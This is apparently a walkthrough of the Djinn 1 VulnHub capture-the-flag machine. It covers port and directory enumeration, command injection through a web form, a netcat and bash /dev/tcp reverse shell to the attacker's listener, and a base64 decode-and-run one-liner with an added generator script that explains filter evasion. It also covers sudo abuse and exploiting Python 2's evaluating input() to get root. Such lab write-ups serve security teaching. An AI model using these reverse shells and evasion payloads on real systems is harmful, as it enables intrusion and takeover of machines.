Djinn 1

Djinn 1 VulnHub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/djinn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.113
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
nmap -p- -Pn 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
1337/tcp open     waste
7331/tcp open     swx
MAC Address: 00:0C:29:3A:97:CE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds

The full port scan turns up two more open ports, 1337 and 7331. Port 22 shows as filtered, meaning something is dropping our probes to SSH rather than the service answering, so the two new ports are where we look next.

FTP

The ftp-anon script in the nmap output shows that anonymous login is allowed. Let's try it.

ftp 192.168.1.110

Once logged in, we can list the directory with the ls command.

There are three files, creds.txt, game.txt and message.txt (the same three nmap's ftp-anon script listed). Let's use the get command to download all three.

With the files on our machine we can read the contents of all three.

More Discovery

Port 1337 is the first of the two ports we just discovered. Let's try it in the browser first.

That gets us nowhere useful, so let's connect to it directly with netcat instead.

It is a game that wants us to answer 1000 times before it hands anything over, and I don't think it will give us our gift that way, so let's move on to the other port, 7331.

gobuster

Nothing on the site itself looks interesting, so let's use gobuster to brute-force directories on it.

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.110:7331/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================

Gobuster finds two directories, /genie and /wish.

Let's navigate to the /wish page.

It takes a command as input: typing id returns the output of id, so whatever we submit here is executed on the server.

Reverse Shell

With a listener set up on my Kali machine, the first thing I tried through /wish was

nc -e /bin/bash 192.168.1.113 444

That does not work. Neither does the same netcat command base64-encoded and piped through base64 -d into a shell to execute.

What does work is the bash reverse shell, and only that one:

bash -i >& /dev/tcp/192.168.1.113/4444 0>&1

Encode it with base64 (I used an online encoder; the base64 command line tool gives the same result).

Then, back on /wish, submit the decode-and-execute one-liner:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash
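Building the same payload without an online encoder, as an added example that is not part of the original write-up. It generates the bash /dev/tcp reverse shell for a given listener, wraps it in the echo | base64 -d | bash one-liner from above, unwraps it again as a sanity check, and shows why the encoded form gets past input filtering that the raw command does not: the base64 body contains only [A-Za-z0-9+/=]. The list of filtered shell metacharacters is an assumption for illustration; the write-up does not show what /wish actually rejects.

```python
import base64
import string

# Shell metacharacters a naive command filter might reject. This list is an
# assumption for the demo, not what the Djinn application actually checks.
SHELL_META = set("&|;<>()$`\\'\"*?[]{}!")
B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def reverse_shell(lhost: str, lport: int) -> str:
    """The bash /dev/tcp reverse shell used in the write-up."""
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def b64_wrap(cmd: str) -> str:
    """Wrap a command so the target decodes and runs it. Everything between
    'echo' and the pipe comes from the base64 alphabet."""
    encoded = base64.b64encode(cmd.encode()).decode("ascii")
    return f"echo {encoded} | base64 -d | bash"


def b64_unwrap(wrapped: str) -> str:
    """Recover the original command from a wrapped one-liner, to check the
    payload before pasting it into a web form."""
    prefix, suffix = "echo ", " | base64 -d | bash"
    if not (wrapped.startswith(prefix) and wrapped.endswith(suffix)):
        raise ValueError("not an echo | base64 -d | bash one-liner")
    encoded = wrapped[len(prefix):-len(suffix)]
    return base64.b64decode(encoded, validate=True).decode()


def metachars(cmd: str) -> set:
    """Which of the (assumed) filtered characters a command contains."""
    return set(cmd) & SHELL_META


def encoded_body_is_clean(wrapped: str) -> bool:
    """True when the base64 body of a wrapped command uses only [A-Za-z0-9+/=]."""
    body = wrapped.split(" ")[1]
    return set(body) <= B64_ALPHABET


if __name__ == "__main__":
    raw = reverse_shell("192.168.1.113", 4444)
    wrapped = b64_wrap(raw)
    print(raw)
    print("filtered characters in raw command:", "".join(sorted(metachars(raw))))
    print(wrapped)
    print("base64 body clean:", encoded_body_is_clean(wrapped))
    print("round trip ok:", b64_unwrap(wrapped) == raw)
```

The wrapper itself still needs a pipe and spaces to reach a shell, so this only helps against filters that look at the command text rather than at what the shell eventually runs.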

Once the shell comes back, the first thing to do is upgrade it to a proper TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Then list the directory and cat app.py.

The credentials are in there in clear text.

With them we can su to the user nitish.

Privilege Escalation

Running sudo -l as nitish shows that we are allowed to run genie as the user sam.

Running strings on the genie binary lists its readable strings.

Among them is a -cmd parameter that the binary accepts.

After playing around with it, this gets us a shell as sam:

sudo -u sam genie -cmd new 

Running sudo -l again, this time as sam, shows that sam can run /root/lago as root.

Running sudo /root/lago shows a menu of choices.

Going through every choice, none of them gets us past the selection.

So let's look around the /home/sam directory for more.

ls -la shows the hidden files, including a .pyc file.

We can use netcat to transfer it to our machine.

On our machine, start a listener that writes whatever arrives to abc.pyc:

nc -nlvp 9000 > abc.pyc

On the target machine, send the file to that listener:

nc -nv 192.168.1.113 9000 < .pyc

A .pyc file is compiled Python bytecode. uncompyle6 can decompile it back to readable source (note the Python 2.7 bytecode marker in its header, which matters below):

uncompyle6 abc.pyc
# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)  # upper bound is inclusive, so num can be 101
    print 'Choose a number between 1 to 100: '
    # Python 2 input() is eval(raw_input()): the typed text is evaluated as
    # an expression in this scope, so it can reference the local num
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
# okay decompiling abc.pyc

This is Python 2 bytecode, and in Python 2 input() is eval(raw_input()): whatever we type at the prompt is evaluated as a Python expression in the scope of guessit(). So if we enter num, it evaluates to the local variable num itself, s == num is true no matter what randint() picked, and system('/bin/sh') runs. Because lago is run through sudo as root, that shell is root. (As a side note, randint(1, 101) includes 101, so an honest guess between 1 and 100 cannot even cover every possible value.)
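The same flaw reproduced on Python 3, as an added example that is not part of the original write-up or of the decompiled script. Python 3's input() no longer evaluates, so the vulnerable version models Python 2's input() with eval() over the function's own locals, and the fixed version parses the answer with int() instead. Passing num explicitly is only there to make the outcome deterministic; the real script draws it with randint().

```python
import random


def guessit_vulnerable(answer: str, num: int = None) -> bool:
    """Models the decompiled guessit(). Python 2's input() is eval(raw_input()),
    which evaluates the typed text as an expression in the caller's scope;
    eval() with this function's locals() reproduces that on Python 3.
    Returns True when the comparison guarding system('/bin/sh') succeeds."""
    if num is None:
        num = random.randint(1, 101)
    # Python 2 equivalent: s = input('Enter your number: ')
    s = eval(answer, globals(), locals())
    return s == num


def guessit_fixed(answer: str, num: int = None) -> bool:
    """Same check with the answer parsed, never evaluated: raw_input() plus
    int() on Python 2, or input() plus int() on Python 3."""
    if num is None:
        num = random.randint(1, 101)
    try:
        s = int(answer.strip())
    except ValueError:
        return False
    return s == num


if __name__ == "__main__":
    # Constructed sample answers: an honest guess, and expressions that reach
    # the secret through the evaluating input().
    for guess in ("42", "num", "num + 0", "[num][0]"):
        print(repr(guess), "vulnerable:", guessit_vulnerable(guess, 57),
              "fixed:", guessit_fixed(guess, 57))
```

The int() version in options() has the same problem for the same reason: int(input(...)) still evaluates the text before converting it. Any Python 2 program that calls input() on untrusted text should use raw_input() instead.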

Run the script as root:

sudo -u root /root/lago

Choose option 2 and, when it prompts for a number between 1 and 100, type num.

Got root!

The flag is in the /root directory.
